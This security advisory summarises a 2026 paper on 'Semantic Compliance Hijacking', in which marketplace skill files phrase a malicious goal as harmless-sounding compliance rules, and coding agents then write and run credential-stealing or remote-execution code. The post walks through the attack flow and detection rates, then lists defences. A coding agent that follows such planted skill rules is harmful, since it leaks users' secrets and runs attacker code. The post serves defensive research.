SUPPLY CHAIN MEDIUM NEW

Semantic Compliance Hijacking: payload-less agent skills that scanners can't see

A May 14, 2026 arXiv paper shows a skill file with no code and no explicit harmful intent can steer a coding agent into writing its own malware at runtime — with a 0.00% detection rate against current scanners.

2026-06-17 // 6 min affects: coding-agents, agent-skill-marketplaces, llm-agents

What is this?

On May 14, 2026, researchers Xinyu Liu, Yukai Zhao, Xing Hu and Xin Xia posted Exploiting LLM Agent Supply Chains via Payload-less Skills to arXiv (cs.CR/cs.SE). It describes Semantic Compliance Hijacking (SCH) — a supply-chain attack on autonomous coding agents that contains no malicious code at all.

Most agent-skill security work so far has hunted for content: hidden instructions, obfuscated payloads, suspicious imports inside a downloaded skill (this is the model behind the static and registry defenses we covered in malicious agent skills and skill.md registry supply chain). SCH sidesteps all of it. The malicious skill ships only natural-language text dressed up as “compliance rules,” and lets the agent’s own generative ability write and run the harmful code at runtime. Against the scanning tools the authors tested, the manipulated skill files held a 0.00% detection rate.

How it works

Agents pull third-party skills from open marketplaces to extend what they can do. A skill is usually a small bundle of instructions plus optional code. SCH poisons only the instruction layer.

Instead of embedding an exploit, the attacker rewrites a malicious goal as a set of innocuous-sounding requirements — phrased as project conventions, “security hardening” steps, or mandatory compliance checks the agent must satisfy while completing the user’s legitimate task. Because the text carries no executable payload and no overt harmful intent, it survives review. The aligned model then does the dangerous part itself: reading the “rules,” it synthesizes and executes code that achieves the attacker’s objective — for example exfiltrating credentials or opening a remote-code-execution path.

# Conceptual only — no working ruleset.
poisoned skill (natural language "compliance rules")  # 0 code, 0 AST signature
        --> agent reads rules as task requirements
        --> agent GENERATES code to "comply"
        --> agent EXECUTES it                          # confidentiality breach / RCE

The authors built an automated pipeline and ran SCH across three mainstream agent frameworks and three foundation models. Peak success reached 77.67% for confidentiality breaches and 67.33% for RCE in the most vulnerable configurations. A second component, Multi-Skill Automated Optimization (MS-AO), spreads the manipulation across several skills to push success higher. The key evasion property: by omitting recognizable Abstract Syntax Tree (AST) signatures and explicit harmful strings, the skill files defeat signature-based scanning entirely. This is a runtime-synthesis cousin of the static skill-ecosystem poisoning studied in related April 2026 work.

Why it matters

Coding agents are now the busiest corner of the agent ecosystem, and skill marketplaces are their package registry. The defensive reflex — scan the artifact before you trust it — assumes the malice lives in the artifact. SCH breaks that assumption: the artifact is clean, and the weapon is the agent. This is the same architectural problem that makes prompt injection hard, applied to the supply chain — there is no reliable boundary between “instructions the agent should follow” and “data it should merely process.”

It also raises the bar for defenders in a concrete way. A 0.00% detection rate against current tooling means review checklists, AST scanners and signature databases provide little assurance here. And because the harmful code is generated fresh each run, two executions of the same skill may not even produce the same payload, frustrating after-the-fact forensics.

A note on scope: this is lab research on a defined test matrix, not a confirmed in-the-wild campaign, and the authors did not publish working rulesets. Treat it as a validated blind spot to close, not an active exploit to fear.

Defenses

Move from signature detection to intent validation. The paper’s own conclusion: scanning for known-bad code can’t catch behavior the agent invents at runtime. Evaluate skills (and tool/skill outputs) for what they would cause the agent to do, not just what strings they contain.
Don’t treat skill text as trusted instructions. Skill descriptions and “rules” are untrusted input. Keep them out of the agent’s privileged instruction channel where you can, and apply contextual-integrity and instruction-hierarchy controls.
Gate the dangerous primitives, not the document. Since compromise lands as generated-then-executed code, put approval and sandboxing on code execution, file/network egress and credential access — the Agents Rule of Two logic. An agent that can’t run arbitrary code or reach the network unattended can’t complete SCH’s last step.
Least privilege for skills. Scope each skill’s filesystem, secret and network access explicitly; deny by default.
Log and review synthesized actions. Capture the code an agent generates and the tool calls it makes, so a runtime-synthesized payload leaves a reviewable trace even when the source skill looked clean.
Prefer vetted, pinned skills. Pull from sources with provenance and version pinning rather than open marketplaces, and re-review on update.

Status

Item	Detail
Technique	Semantic Compliance Hijacking (SCH) — payload-less skill supply-chain attack
Source	arXiv:2605.14460 (cs.CR/cs.SE), submitted May 14, 2026
Peak success	77.67% confidentiality breach · 67.33% RCE (most vulnerable config)
Detection	0.00% against tested signature/AST scanners
Test scope	3 agent frameworks × 3 foundation models (not named in abstract)
Real-world status	Research result; no confirmed in-the-wild use; no working ruleset released